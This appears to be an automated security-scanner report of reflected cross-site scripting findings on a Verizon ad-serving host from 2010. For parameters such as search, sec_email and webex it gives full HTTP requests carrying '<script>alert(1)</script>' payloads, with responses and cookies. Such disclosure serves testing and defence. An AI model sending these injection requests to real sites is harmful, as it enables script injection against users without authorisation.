GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55331"><script>alert(1)</script>3099bd94315 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:58:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a8c"><script>alert(1)</script>afe03052625 was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:56:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98904"><script>alert(1)</script>6476ec4b36d was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd524"><script>alert(1)</script>db31b89a21 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1358 Content-Type: text/html Cache-Control: private Content-Length: 1358
The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c3a7"><script>alert(1)</script>6769bca969e was submitted in the usertype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da1a"><script>alert(1)</script>d0153c69ecc was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:53:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59812"><script>alert(1)</script>b6620b35637 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e095"><script>alert(1)</script>1f394cc321d was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff424"><script>alert(1)</script>ef31f985b3 was submitted in the viss parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a690"><script>alert(1)</script>2618c9bf78 was submitted in the webex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f4c"><script>alert(1)</script>718101defe9 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360